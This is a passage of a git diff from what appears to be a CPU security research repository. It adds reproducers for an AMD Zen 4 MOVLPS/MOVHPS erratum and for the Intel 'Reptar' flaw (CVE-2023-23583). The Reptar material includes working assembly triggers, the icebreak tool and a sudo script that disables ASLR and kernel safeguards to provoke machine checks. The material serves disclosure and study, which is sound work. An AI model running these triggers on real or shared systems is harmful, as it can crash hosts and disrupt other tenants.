+        //        Wvvvv1pp
+        ".byte 0b11111101   \n" // P1
+        //        zLLbVaaa
+        ".byte 0b00001000   \n" // P2
+        ".byte 0x6e, 0xec   \n" // movq
+        ".att_syntax prefix \n"
+    );
+
+    // Grab the first word, which should be equal to rsp, right?
+    _mm_storeu_si128((void *) regstate, r1);
+    return regstate[0];
+}
+
+int main(int argc, char **argv)
+{
+    uint64_t correct;
+    uint64_t result;
+
+    for (uint64_t i = 0 ;; i++) {
+        result = vpinsrw_testcase(&correct);
+
+        if (correct != result) {
+            // The low 32 bits are enough to show the discrepancy.
+            fprintf(stderr, "after %" PRIu64 ": %#x vs %#x\n",
+                    i, (unsigned int)result, (unsigned int)correct);
+        }
+    }
+    return 0;
+}
diff --git a/pocs/cpus/errata/amd/genoa-lps-hps/README.md b/pocs/cpus/errata/amd/genoa-lps-hps/README.md
new file mode 100644
index 00000000..d9e4b9ae
--- /dev/null
+++ b/pocs/cpus/errata/amd/genoa-lps-hps/README.md
@@ -0,0 +1,105 @@
+# EVEX encoded MOVLPS/MOVHPS can modify incorrect destination

+Tavis Ormandy
+

+
+> *This document is a Work In Progress and represents an errata currently under investigation*
+
+## Introduction
+
+We have observed an error on the AMD Zen 4 family of processors with
+EVEX encoded `VMOVLPS` and `VMOVHPS` instructions.
+
+The `MOVLPS` and `MOVHPS` instructions load two 32-bit packed single precision
+floats from the source operand into the low or high 64-bits of a vector
+register.
+
+To illustrate this, consider this minimal example:
+
+```asm
+section .data
+    a: dd 0x11111111, 0x22222222
+    b: dd 0x33333333, 0x44444444
+
+section .text
+    movhps xmm0, [rel a]
+    movlps xmm0, [rel b]
+```
+
+The result should be that `xmm0` contains the value `0x22222222111111114444444433333333`.
+
+## Details
+
+It is possible to use a three operand form of these instructions, where the two
+merged source operands are placed in a third destination operand. For example:
+
+```
+    vmovhps xmm0, xmm1, [rel a]
+```
+
+Consider this sequence:
+
+```asm
+section .data
+    data: dd 0x11111111, 0x22222222, 0x33333333, 0x44444444
+    zero: dd 0,0,0,0
+
+section .text
+    vmovdqu xmm0, [rel data]
+    vmovlps xmm1, xmm0, [rel zero]
+    vmovhps xmm17, xmm0, [rel zero]
+```
+
+The expected result would be:
+
+```
+xmm0  = 0x44444444333333332222222211111111
+xmm1  = 0x44444444333333330000000000000000
+xmm17 = 0x00000000000000002222222211111111
+```
+
+However, on Genoa we non-deterministically get `xmm1=0`. We have confirmed the
+bug is reproducible on the following SKU:
+
+- `Family=0x19 Model=0x11 Stepping=0x01 Patch=0xa10113b`
+
+You can verify the current Model, Family, Stepping and Patch level by
+examining `/proc/cpuinfo`.
+
+### Reproducing
+
+The program `movhps.c` is the testcase.
+
+It should not produce any output unless an affected core is detected.
+
+#### Building
+
+```
+$ gcc -mavx512vl -o movhps movhps.c
+```
+
+#### Running
+
+The normal expected output of `movhps` should be empty.
+
+On an affected CPU, the output might look like this:
+
+```
+$ ./movhps
+After 1: 0000000000000000, 0000000000000000
+After 2: 0000000000000000, 0000000000000000
+After 1: 0000000000000000, 0000000000000000
+After 2: 0000000000000000, 0000000000000000
+After 1: 0000000000000000, 0000000000000000
+After 2: 0000000000000000, 0000000000000000
+```
+
+This indicates that sometimes the wrong value was tested.
+
+### Conclusion
+
+It is possible for incorrect results to be produced even by code generated
+from compiler intrinsics. It is not clear what values are being tested, or if
+it is possible to infer any other state.
+
+AMD have indicated that they do not believe this is a security issue, but gave
+no further explanation when asked.
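+
+The testcase drives the encodings from inline assembly, but for context, below
+is a minimal sketch of how ordinary SSE intrinsics can reach these three
+operand forms. The exact instruction selection is up to the compiler, so this
+is illustrative rather than a guaranteed reproducer:
+
+```c
+// Illustrative only: _mm_loadl_pi/_mm_loadh_pi map to MOVLPS/MOVHPS, and
+// with AVX enabled the compiler may pick the merged three operand
+// VMOVLPS/VMOVHPS encodings discussed above.
+#include <stdio.h>
+#include <immintrin.h>
+
+int main(void)
+{
+    float data[4] = { 1.0f, 2.0f, 3.0f, 4.0f };
+    float zero[2] = { 0.0f, 0.0f };
+    __m128 v  = _mm_loadu_ps(data);
+    __m128 lo = _mm_loadl_pi(v, (const __m64 *)zero); // low 64 bits from zero
+    __m128 hi = _mm_loadh_pi(v, (const __m64 *)zero); // high 64 bits from zero
+    float out[4];
+
+    _mm_storeu_ps(out, lo);
+    printf("lo: %g %g %g %g\n", out[0], out[1], out[2], out[3]);
+    _mm_storeu_ps(out, hi);
+    printf("hi: %g %g %g %g\n", out[0], out[1], out[2], out[3]);
+    return 0;
+}
+```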
diff --git a/pocs/cpus/errata/amd/genoa-lps-hps/movhps.c b/pocs/cpus/errata/amd/genoa-lps-hps/movhps.c
new file mode 100644
index 00000000..d8c3b1ca
--- /dev/null
+++ b/pocs/cpus/errata/amd/genoa-lps-hps/movhps.c
@@ -0,0 +1,53 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <stdbool.h>
+#include <inttypes.h>
+#include <immintrin.h>
+
+#define __aligned __attribute__((aligned(32)))
+
+#if !defined(__AVX512VL__)
+# error You must compile this with -mavx512vl to get the needed intrinsics
+#endif
+
+static const uint64_t kData[] = { 0x4444444444444444, 0x4242424242424242 };
+static const uint64_t kZero;
+
+static void vmovhps_testcase(void)
+{
+    uint64_t result[2] __aligned = {0};
+    register __m128i r0 asm("xmm0");
+    register __m128i r1 asm("xmm1");
+    register __m128i r17 asm("xmm17");
+    uint64_t count = 0;
+
+    _mm256_zeroall();
+
+    do {
+        count++;
+
+        // Trigger bug
+        asm volatile ("vmovdqu %1, %0" : "=v"(r0) : "m"(kData));
+        asm volatile ("vmovlps %2, %1, %0" : "=v"(r1) : "v"(r0), "m"(kZero));
+        asm volatile ("vmovhps %2, %1, %0" : "=v"(r17) : "v"(r0), "m"(kZero));
+    } while (!_mm_testz_si128(r1, r1));
+
+    _mm_storeu_si128((void *) result, r1);
+
+    fprintf(stderr, "After %" PRIu64 ": %016" PRIx64 ", %016" PRIx64 "\n",
+            count, result[0], result[1]);
+    return;
+}
+
+int main(int argc, char **argv)
+{
+    while (true) {
+        vmovhps_testcase();
+    }
+    return 0;
+}
diff --git a/pocs/cpus/reptar/Makefile b/pocs/cpus/reptar/Makefile
new file mode 100644
index 00000000..242c63aa
--- /dev/null
+++ b/pocs/cpus/reptar/Makefile
@@ -0,0 +1,16 @@
+CFLAGS=-O0 -ggdb3 -march=icelake-server
+LDFLAGS=-pthread -Wl,-z,noexecstack -static
+NFLAGS=
+
+.PHONY: clean
+
+all: icebreak
+
+%.o: %.asm
+	nasm $(NFLAGS) -O0 -felf64 -o $@ $^
+
+icebreak: main.o hammer.o threads.o util.o
+
+clean:
+	rm -f *.o core
+	rm -f icebreak
diff --git a/pocs/cpus/reptar/README.md b/pocs/cpus/reptar/README.md
new file mode 100644
index 00000000..e853f50b
--- /dev/null
+++ b/pocs/cpus/reptar/README.md
@@ -0,0 +1,151 @@
+# REP MOVSB Redundant Prefixes Can Corrupt Ice Lake Microarchitectural State

aka "Reptar", CVE-2023-23583

+

+Tavis Ormandy
+Eduardo Vela Nava
+Josh Eads
+Alexandra Sandulescu
+

+
+## Introduction
+
+If you've ever written any x86 assembly at all, you've probably used `rep movsb`.
+It's the idiomatic way of moving memory around on x86. You set the *source*,
+*destination*, *direction* and the *count* - then just let the processor handle
+all the details!
+
+```nasm
+lea rdi, [rel dst]
+lea rsi, [rel src]
+std
+mov rcx, 32
+rep movsb
+```
+
+The actual instruction here is `movsb`; the `rep` is simply a prefix that
+changes how the instruction works. In this case, it indicates that you want
+this operation **rep**eated multiple times.
+
+There are lots of other prefixes too, but they don't all apply to every
+instruction.
+
+#### Prefix Decoding
+
+An interesting feature of x86 is that the instruction decoding is generally
+quite relaxed. If you use a prefix that doesn't make sense or conflicts with
+other prefixes, nothing much will happen - it will usually just be ignored.
+
+This fact is sometimes useful; compilers can use redundant prefixes to pad a
+single instruction to a desirable alignment boundary.
+
+Take a look at this snippet; this is exactly the same code as above, just with a
+bunch of useless or redundant prefixes added:
+
+```nasm
+            rep lea rdi, [rel dst]
+             cs lea rsi, [rel src]
+       gs gs gs std
+          repnz mov rcx, 32
+rep rep rep rep movsb
+```
+
+Perhaps the most interesting prefixes are `rex`, `vex` and `evex`, all of which
+change how subsequent instructions are decoded.
+
+Let's take a look at how they work.
+
+#### The REX prefix
+
+The i386 only had 8 general purpose registers, so you could specify which
+register you want to use in just 3 bits (because 2^3 is 8).
+
+The way that instructions were encoded took advantage of this fact, and reserved
+*just* enough bits to specify any of those registers.
+
+This is a problem, because x86-64 added 8 additional general purpose registers.
+We now have sixteen possible registers... that's 2^4, so we're going
+to need another bit.
+
+The solution to this is the `rex` prefix, which gives us some spare bits that
+the next instruction can borrow.
+
+When we're talking about rex, we usually write it like this:
+
+```nasm
+rex.rxb
+```
+
+`rex` is a single-byte prefix; the first four bits are mandatory and the
+remaining four bits, called `b`, `x`, `r` and `w`, are all optional. If you see
+`rex.rb`, that means only the `r` and `b` bits are set - all the others are
+unset.
+
+These optional bits give us room to encode more general purpose registers in
+the following instruction.
+
+#### Encoding Rules
+
+So now we know that `rex` increases the available space for encoding operands,
+and that useless or redundant prefixes are usually ignored on x86. So... what
+should this instruction do?
+
+```nasm
+rex.rxb rep movsb
+```
+
+The `movsb` instruction doesn't have any operands - they're all implicit - so
+any `rex` bits are meaningless.
+
+If you guessed that the processor will just silently ignore the `rex` prefix,
+you would be correct!
+
+Well... except on machines that support a new feature called *fast short
+repeat move*! We discovered that a bug with redundant `rex` prefixes could
+interact with this feature in an unexpected way and introduce a serious
+vulnerability.
+
+#### Reproduce
+
+We're publishing all of our research today to our [security research
+repository](https://github.com/google/security-research/). If you want to
+reproduce the vulnerability you can use our `icebreak` tool; I've also made a
+local mirror available [here](files/icebreak.tar.gz).
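+
+The core of the testcase boils down to a `movsb` carrying both a redundant
+`rex` prefix and a `rep` prefix. A minimal sketch of the trigger sequence
+(the real loop in `icebreak.asm` adds alignment, counters and a syscall):
+
+```nasm
+lea rdi, [rel dst]
+lea rsi, [rel src]
+mov rcx, 1
+rep                 ; prefix for the movsb below
+db 0x44             ; rex.r - meaningless for movsb, normally ignored
+movsb
+```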
+ +``` +$ ./icebreak -h +usage: ./icebreak [OPTIONS] + -c N,M Run repro threads on core N and M. + -d N Sleep N usecs between repro attempts. + -H N Spawn a hammer thread on core N. +icebreak: you must at least specify a core pair with -c! (see -h for help) +``` + +The testcase enters what should be an infinite loop, and unaffected systems +should see no output at all. On affected systems, a `.` is printed on each +successful reproduction. + +``` +$ ./icebreak -c 0,4 +starting repro on cores 0 and 4 +......................................................................... +......................................................................... +......................................................................... +......................................................................... +......................................................................... +``` + +In general, if the cores are SMT +siblings then you may observe random branches and if they're SMP siblings from the same package +then you may observe machine checks. + +If you do *not* specify two different cores, then you might need to use a +hammer thread to trigger a reproduction. + +## Solution + +Intel have +[published](https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00950.html) +updated microcode for all affected processors. Your operating system or BIOS +vendor may already have an update available! + diff --git a/pocs/cpus/reptar/config.asm b/pocs/cpus/reptar/config.asm new file mode 100644 index 00000000..e69de29b diff --git a/pocs/cpus/reptar/hammer.asm b/pocs/cpus/reptar/hammer.asm new file mode 100644 index 00000000..f9e3e171 --- /dev/null +++ b/pocs/cpus/reptar/hammer.asm @@ -0,0 +1,22 @@ +BITS 64 + +%include "syscalls.asm" +%include "macros.asm" +%include "config.asm" + +section .text + +global sibling_trigger +global sibling_fault + +sibling_trigger: + mfence + mov rax, SYS_sched_yield + syscall + jmp sibling_trigger + hlt + +sibling_fault: + .repeat: + ud2 + jmp .repeat diff --git a/pocs/cpus/reptar/icebreak.asm b/pocs/cpus/reptar/icebreak.asm new file mode 100644 index 00000000..d1b58a4a --- /dev/null +++ b/pocs/cpus/reptar/icebreak.asm @@ -0,0 +1,47 @@ +BITS 64 + +%include "syscalls.asm" +%include "macros.asm" +%include "config.asm" + +global icelake_repro +global icelake_buf + +section .data + align 4096 + dst: dq 0, 0 + src: dq 0, 0 +section .text + + ; This should be aligned on a page boundary so that we can mprotect/madvise it. + align 4096 +icelake_repro: + ; We ret on error, so save where we want to go. + ; this is just because ret is a one-byte opcode. + push .finish + xor r8, r8 ; iteration counter + mov rax, SYS32_sched_yield ; this benchmarks better than syscall + int 0x80 + xor rcx, rcx + align 32 + ; If you find an MCE difficult to repro, adjust this number for your SKU (try 0..8). + times 2 nop + .repeat: + inc r8 ; keep track of executions + inc rcx ; movsb count + lea rdi, [rel dst] + lea rsi, [rel src] + rep + rex + rex r + movsb + rep movsb + jmp short .repeat + .after: + lfence + ; This should be unreachable + times 128 ret + .finish: + mov rax, r8 + ret + hlt diff --git a/pocs/cpus/reptar/macros.asm b/pocs/cpus/reptar/macros.asm new file mode 100644 index 00000000..d6cb8f12 --- /dev/null +++ b/pocs/cpus/reptar/macros.asm @@ -0,0 +1,21 @@ + +; macro to generate rex bytes +; e.g. 
rex w,x,b
+%macro rex 0-4
+    %assign _rex 0b01000000
+    %rep %0
+        %ifidni %1, W
+            %assign _rex _rex | 0b1000
+        %elifidni %1, R
+            %assign _rex _rex | 0b0100
+        %elifidni %1, X
+            %assign _rex _rex | 0b0010
+        %elifidni %1, B
+            %assign _rex _rex | 0b0001
+        %else
+            %error unrecognized flag %1
+        %endif
+        %rotate 1
+    %endrep
+    db _rex
+%endmacro
diff --git a/pocs/cpus/reptar/main.c b/pocs/cpus/reptar/main.c
new file mode 100644
index 00000000..f2d36f05
--- /dev/null
+++ b/pocs/cpus/reptar/main.c
@@ -0,0 +1,138 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <stdbool.h>
+#include <string.h>
+#include <unistd.h>
+#include <pthread.h>
+#include <err.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <sys/time.h>
+#include <sys/resource.h>
+
+#include "threads.h"
+#include "util.h"
+
+extern uint64_t icelake_repro();
+extern uint64_t sibling_trigger();
+
+static void * icelake_worker(void *param)
+{
+    // Need to enable cancellation.
+    pthread_setcanceltype(PTHREAD_CANCEL_ASYNCHRONOUS, NULL);
+
+    icelake_repro();
+
+    pthread_setcanceltype(PTHREAD_CANCEL_DEFERRED, NULL);
+
+    return 0;
+}
+
+static void * icelake_hammer(void *param)
+{
+    // Need to enable cancellation.
+    pthread_setcanceltype(PTHREAD_CANCEL_ASYNCHRONOUS, NULL);
+
+    sibling_trigger();
+
+    pthread_setcanceltype(PTHREAD_CANCEL_DEFERRED, NULL);
+
+    return 0;
+}
+
+static void print_help()
+{
+    logmsg("usage: ./icebreak [OPTIONS]");
+    logmsg("    -c N,M     Run repro threads on core N and M.");
+    logmsg("    -d N       Sleep N usecs between repro attempts.");
+    logmsg("    -H N       Spawn a hammer thread on core N.");
+}
+
+static struct rlimit rlim = {
+    .rlim_cur = 0,
+    .rlim_max = 0,
+};
+
+static int delay = 1000;
+
+int main(int argc, char **argv)
+{
+    pthread_t A = 0, B = 0;
+    pthread_t hammer = 0;
+    int coreA = -1;
+    int coreB = -1;
+    int opt;
+    int coreH = -1;
+    pid_t child;
+
+    setrlimit(RLIMIT_CORE, &rlim);
+
+    while ((opt = getopt(argc, argv, "H:hc:d:")) != -1) {
+        switch (opt) {
+            case 'c': if (sscanf(optarg, "%u,%u", &coreA, &coreB) != 2)
+                          errx(EXIT_FAILURE, "the format required is N,M, for example: 0,1");
+                      break;
+            case 'd': delay = atoi(optarg);
+                      break;
+            case 'H': coreH = atoi(optarg);
+                      break;
+            case 'h': print_help();
+                      break;
+            default:
+                print_help();
+                errx(EXIT_FAILURE, "unrecognized commandline argument");
+        }
+    }
+
+    if (coreA < 0 || coreB < 0) {
+        errx(EXIT_FAILURE, "you must at least specify a core pair with -c! (see -h for help)");
+    }
+
+    if (coreH >= 0) {
+        hammer = spawn_thread_core(icelake_hammer, NULL, coreH);
+        logmsg("Hammer thread %p on core %d", hammer, coreH);
+    }
+
+    logmsg("starting repro on cores %d and %d", coreA, coreB);
+
+    do {
+        // Run this in a subprocess in case it crashes.
+        if ((child = fork()) == 0) {
+
+            // Make sure it doesn't get stuck if it jumps into an infinite loop.
+            alarm(5);
+
+            // Attempt to repro 64 times.
+            int a = 1, b = 1;
+            for (int i = 0; i < 64; i++) {
+                if (!A || (a = pthread_tryjoin_np(A, NULL)) == 0)
+                    A = spawn_thread_core(icelake_worker, NULL, coreA);
+                if (!B || (b = pthread_tryjoin_np(B, NULL)) == 0)
+                    B = spawn_thread_core(icelake_worker, NULL, coreB);
+
+                if (a == 0 || b == 0)
+                    fputc('.', stderr);
+                else
+                    usleep(delay);
+            }
+
+            // No luck, it might be in a weird state - restart.
+            pthread_cancel(A);
+            pthread_cancel(B);
+
+            fputc('\n', stderr);
+
+            pthread_join(A, NULL);
+            pthread_join(B, NULL);
+
+            _exit(0);
+        }
+    } while (waitpid(child, NULL, 0) != -1);
+
+    err(EXIT_FAILURE, "this is supposed to be unreachable, waitpid() failed");
+
+    return 0;
+}
diff --git a/pocs/cpus/reptar/minimized/Makefile b/pocs/cpus/reptar/minimized/Makefile
new file mode 100644
index 00000000..91cea997
--- /dev/null
+++ b/pocs/cpus/reptar/minimized/Makefile
@@ -0,0 +1,27 @@
+elf_targets=$(shell find . -name '*.elf.asm' -type f -printf "%f\n" | sed 's/\.asm//' | xargs)
+bin_targets=$(shell find . -name '*.bin.asm' -type f -printf "%f\n" | sed 's/\.asm//' | xargs)
+test_targets=$(shell find . -name '*.gdb' -type f -printf "%f\n" | sed 's/\.gdb/.gdb.out/' | xargs)
+
+.PHONY: clean all test test_elf
+all: $(elf_targets) $(bin_targets)
+
+clean:
+	rm -rf *.o *.elf *.bin
+
+test: $(test_targets)
+
+%.gdb.out: %
+	gdb -n -batch-silent -x $^.gdb
+
+%.bin.asm: third_party/*.asm
+	touch $@
+
+%.bin: %.bin.asm
+	nasm -f bin $^ -o $@
+	chmod +x $@
+
+%.o: %.elf.asm
+	nasm -g -F DWARF -f elf64 $^ -o $@
+
+%.elf: %.o
+	ld $^ -o $@
diff --git a/pocs/cpus/reptar/minimized/README.md b/pocs/cpus/reptar/minimized/README.md
new file mode 100644
index 00000000..edf06de7
--- /dev/null
+++ b/pocs/cpus/reptar/minimized/README.md
@@ -0,0 +1,18 @@
+# Minimized Reptar Examples
+
+This directory provides a set of examples to reproduce and study the Reptar vulnerability.
+
+You can build them all simply by running `make`. Building the code requires `nasm`, `binutils` (for `ld`) and `make`. On an Ubuntu system you can install these with `apt install -y nasm make binutils`.
+
+## Quick Summary
+
+- **reptar.align.elf.asm**: This is a more reliable reproducer that triggers an error on the first iteration. The `clflush` and the reptar instruction need to be in different 16-byte windows. This could be related to the instruction decoder working on 16 bytes of instructions at a time.
+- **reptar.boot.bin.asm**: Same as align, but intended to be run from a VM using KVM: `qemu-system-x86_64 --enable-kvm -fda reptar.boot.bin`.
+- **reptar.xlat.elf.asm**: This is similar to `reptar.align.elf.asm` but generates tracing information on the syscalls it executes, so that when the program resumes at a different location, it is possible to observe the consequences. Pause will freeze the process, exit will pass `AL` as the exit code and yield will simply leave the latest `RIP` in `RCX`.
+- **reptar.spec.elf.asm**: This is a test used to check whether the bug works under speculation. Its setup is similar to `reptar.align.elf.asm`, but it only runs a few iterations and prints the speed at which it's able to access memory. During the "loop" generated by the bug, we access specific parts of memory, which would also happen if the bug executed speculatively. Run the code as `./reptar.spec.elf | od -i`. If speculation worked, you would see multiple "short" (<150 cycles) accesses; if it didn't work, you will only see one.
+- **reptar.loopless.elf.asm**: This is an easier-to-modify reproducer that will also trigger the bug somewhat reliably, but additionally allows modifying the instructions executed before and after. Note the registers that the program uses at the top.
+- **reptar.loop.elf.asm**: This is a more documented reproducer that explains what happens when the bug triggers, and which instructions execute and which don't. Running the program under GDB should allow for quick debugging.
+- **reptar.vdso.elf.bin.asm**: This is an experiment where we map ourselves just before the VDSO (you must disable ASLR first and adjust the addresses) and then make the "wrong RIP" point to the VDSO address of the time() function. As a result, the current time is stored at the address pointed to by RAX, which is then clflushed so that it triggers a segfault on the current time. If we had corrupted the uop$ then we would instead expect a crash, so it appears that a long jump to the VDSO doesn't corrupt the uop$. To test, try: `taskset -c 7 gdb ./reptar.vdso.elf.bin -ex r -ex 'python import datetime;print(datetime.datetime.utcfromtimestamp(gdb.parse_and_eval("*$rdi")))' -ex 'p $rsp' -ex q` - if the uop$ was not corrupted, you should see the current date/time. If it was, we would expect a segfault when writing to `0x42` at the poisoned address.
+- **reptar.uncan.elf.bin.asm**: This is an experiment where we map ourselves at the end of the canonical address space for x86_64 (needs ASLR to be enabled) and then run for as long as we can before inevitably faulting, to see how far we can get into invalid address space. The error should be something like `general protection fault ip:8000000019f5 error:0`, with the last 4 bytes varying depending on how many iterations it did.
+- **reptar.mce.elf.asm**: Trigger this with `./log_mce.sh` and adjust CPUs 15/7 so that they are siblings. This code will trigger an MCE on some affected CPUs and log the details. Look at `mce.txt` for the expected MCE errors. If no MCE is visible, define `MCE_INSTRUCTION='rep movsb'`, as that works instead on some CPUs.
+- **reptar.mce.boot.bin.asm**: Same as mce, but intended to be run from a VM using KVM: `qemu-system-x86_64 --enable-kvm -fda reptar.mce.boot.bin`.
diff --git a/pocs/cpus/reptar/minimized/log_mce.sh b/pocs/cpus/reptar/minimized/log_mce.sh
new file mode 100755
index 00000000..176e6763
--- /dev/null
+++ b/pocs/cpus/reptar/minimized/log_mce.sh
@@ -0,0 +1,28 @@
+#!/bin/bash
+
+set -ex
+
+touch reptar.log
+cat reptar.log
+echo > reptar.log
+
+sudo mount -t debugfs none /sys/kernel/debug || true
+echo 1 | sudo tee /sys/kernel/debug/mce/fake_panic
+echo 0 | sudo tee /proc/sys/kernel/watchdog
+echo 0 | sudo tee /proc/sys/kernel/printk_ratelimit
+echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
+echo 0 | sudo tee /sys/bus/cpu/devices/cpu15/online
+
+touch reptar.mce.asm
+make reptar.mce.elf
+
+for i in {1..10}; do
+    echo $i | tee -a reptar.log
+    sudo sync
+    sleep 0.3s
+    taskset -c 7 ./reptar.mce.elf &
+    sleep 1s
+    sudo dmesg -t | grep mce: | uniq -c | tee -a reptar.log
+    sudo cat /sys/kernel/debug/mce/severities-coverage | grep -v $'^0\t' | tr '\n' , | tr '\t' : | tee -a reptar.log
+    kill -9 %1 || true
+done
diff --git a/pocs/cpus/reptar/minimized/mce.txt b/pocs/cpus/reptar/minimized/mce.txt
new file mode 100644
index 00000000..99509294
--- /dev/null
+++ b/pocs/cpus/reptar/minimized/mce.txt
@@ -0,0 +1,43 @@
+mce: [Hardware Error]: Machine check events logged
+mce: [Hardware Error]: CPU 7: Machine Check: 0 Bank 0: f6000000000f0150
+mce: [Hardware Error]: TSC 0 ADDR a540a56
+mce: [Hardware Error]: PROCESSOR 0:806d1 TIME 1700915672 SOCKET 0 APIC e microcode 3c
+
+Machine check events logged
+Hardware event. This is not a software error.
+CPU 7 BANK 0 +ADDR a540a56 +TIME 1700915672 Sat Nov 25 13:34:32 2023 +MCG status: +MCi status: +Error overflow +Uncorrected error +Error enabled +MCi_ADDR register valid +Processor context corrupt +MCA: Instruction CACHE Level-1 Instruction-Fetch Error +STATUS f6000000000f0150 MCGSTATUS 0 +CPUID Vendor Intel Family 6 Model 141 Step 1 +SOCKET 0 APIC e microcode 3c + +mce: [Hardware Error]: Machine check events logged +mce: [Hardware Error]: CPU 7: Machine Check: 0 Bank 3: be00000000800400 +mce: [Hardware Error]: TSC 0 ADDR 41a193 MISC 41a193 +mce: [Hardware Error]: PROCESSOR 0:806d1 TIME 1700915672 SOCKET 0 APIC e microcode 3c + +Machine check events logged +Hardware event. This is not a software error. +CPU 7 BANK 3 +MISC 41a193 ADDR 41a193 +TIME 1700915672 Sat Nov 25 13:34:32 2023 +MCG status: +MCi status: +Uncorrected error +Error enabled +MCi_MISC register valid +MCi_ADDR register valid +Processor context corrupt +MCA: Internal Timer error +STATUS be00000000800400 MCGSTATUS 0 +CPUID Vendor Intel Family 6 Model 141 Step 1 +SOCKET 0 APIC e microcode 3c \ No newline at end of file diff --git a/pocs/cpus/reptar/minimized/reptar.align.elf.asm b/pocs/cpus/reptar/minimized/reptar.align.elf.asm new file mode 100644 index 00000000..f739d039 --- /dev/null +++ b/pocs/cpus/reptar/minimized/reptar.align.elf.asm @@ -0,0 +1,39 @@ +BITS 64 + +global _start + +section .text + _start: + mov eax, 24 ; yield + jmp .suffix + .attack: + mov eax, 60 ; exit + xor ecx, ecx; clear ecx + lea rsi, [rsp+1] + mov rdi, rsi + .many_reptars: + %rep 1 + align 0x1000 + ; 16 bytes + times 4 nop ; 4 bytes + dec rsi ; 3 bytes + dec rdi ; 3 bytes + inc rbx ; 3 bytes + inc rcx ; 3 bytes + ; 16 bytes + clflush [rdi] ; 3 bytes + clflush [rsi+64] ; 4 bytes + mov [rsp], rbx ; 4 bytes + rep ; 1 byte + db 0x44; rex.r ; 1 byte + movsb ; 1 byte + rep ; 1 byte + nop ; 1 byte + %endrep + .suffix: + align 0x1000 + times 0x1000*8 rep pause + .exit: + mov dil, bl ; counter + syscall + jmp .attack diff --git a/pocs/cpus/reptar/minimized/reptar.align.elf.gdb b/pocs/cpus/reptar/minimized/reptar.align.elf.gdb new file mode 100644 index 00000000..2fe75988 --- /dev/null +++ b/pocs/cpus/reptar/minimized/reptar.align.elf.gdb @@ -0,0 +1,26 @@ +file reptar.align.elf + +starti + +break '_start.exit' if $rbx == 1 +commands + pipe printf "FAIL(rbx=%x,oneiter)\n", $rbx | cat + quit 1 +end + +break '_start.exit' if $rbx > 1 +commands + pipe printf "PASS(rbx=%x,nopsled)\n", $rbx | cat + quit 0 +end + +catch signal SIGSEGV +commands + pipe printf "PASS(rbx=%x,segfault)\n", $rbx | cat + quit 0 +end + +continue + +pipe printf "FAIL(rbx=%x,unexpected)\n", $rbx | cat +quit 1 diff --git a/pocs/cpus/reptar/minimized/reptar.boot.bin.asm b/pocs/cpus/reptar/minimized/reptar.boot.bin.asm new file mode 100644 index 00000000..e79b1e35 --- /dev/null +++ b/pocs/cpus/reptar/minimized/reptar.boot.bin.asm @@ -0,0 +1,37 @@ +%macro LONG_MODE_BOOT_PAYLOAD 0 + _start: + xor rbx, rbx + xor rdx, rdx + inc r15 + .attack: + cmp rdx, 1000000 + ja _start + xor ecx, ecx + lea rsi, [rsp+1] + mov rdi, rsi + .many_reptars: + align 64 + ; 16 bytes + times 4 nop ; 4 bytes + dec rsi ; 3 bytes + dec rdi ; 3 bytes + inc rbx ; 3 bytes + inc rcx ; 3 bytes + ; 16 bytes + clflush [rdi] ; 3 bytes + clflush [rsi+64] ; 4 bytes + ;mov [rsp], rbx ; 4 bytes + rep ; 1 byte + db 0x44; rex.r ; 1 byte + movsb ; 1 byte + rep ; 1 byte + nop ; 1 byte + align 64 + inc rdx + cmp rdx, rbx + je .attack + times 0x6000 nop + jmp _start +%endmacro + +%include "third_party/long_mode_boot.asm" diff --git 
a/pocs/cpus/reptar/minimized/reptar.boot.bin.gdb b/pocs/cpus/reptar/minimized/reptar.boot.bin.gdb new file mode 100644 index 00000000..73f49d05 --- /dev/null +++ b/pocs/cpus/reptar/minimized/reptar.boot.bin.gdb @@ -0,0 +1,17 @@ +target remote | exec qemu-system-x86_64 --enable-kvm -gdb stdio -S -fda reptar.boot.bin + +hbreak *0x7E00 if $r15 > 0 && $rbx!=$rdx +commands + pipe printf "PASS(r15=%d,rbx=%d,rdx=%d)\n", $r15, $rbx, $rdx | cat + kill + quit 0 +end + +hbreak *0x7E00 if $r15 > 0 && $rbx==$rdx +commands + pipe printf "FAIL(r15=%d,rbx=%d,rdx=%d)\n", $r15, $rbx, $rdx | cat + kill + quit 1 +end + +continue diff --git a/pocs/cpus/reptar/minimized/reptar.loop.elf.asm b/pocs/cpus/reptar/minimized/reptar.loop.elf.asm new file mode 100644 index 00000000..d867c597 --- /dev/null +++ b/pocs/cpus/reptar/minimized/reptar.loop.elf.asm @@ -0,0 +1,59 @@ +BITS 64 + +global _start + +section .data + data: times 128 db 0 + +section .text + _start: + mov cl, 7 + mov eax, data + .loop_for_every_iteration: + mov rbx, cs + push rbx + push .loop_only_on_bug + call far [rsp] + .return_from_far_call: + align 64 + .loop_only_on_bug: + push rcx + clflush [rax] + clflush [rax+64] + mov rsi, 0 + cmp cl, 7 + cmove rsi, rax ; only make a valid move if rcx is 7 + mov rdi, data + mov cl, 1 + + align 64 + .reptar: + rep + db 0x44; rex.r + movsb + ; WHEN THE BUG TRIGGERS NOTHING BELOW HERE EXECUTES + ; the instructions at loop_only_on_bug execute instead + ; and the instruction pointer as seen by interrupts is + ; the one as if the execution continued below + .after_reptar: + rep + times 4 nop + jmp .skip_reptar_alias + + align 64 + ; this is aligned to match the rep rex.r movsb instruction + .reptar_alias: + nop;rep + nop;rex.r + nop;movsb + ; we cause a segfault on movsb above (by cmov rsi) but RIP will + ; point here instead on the segfault. 
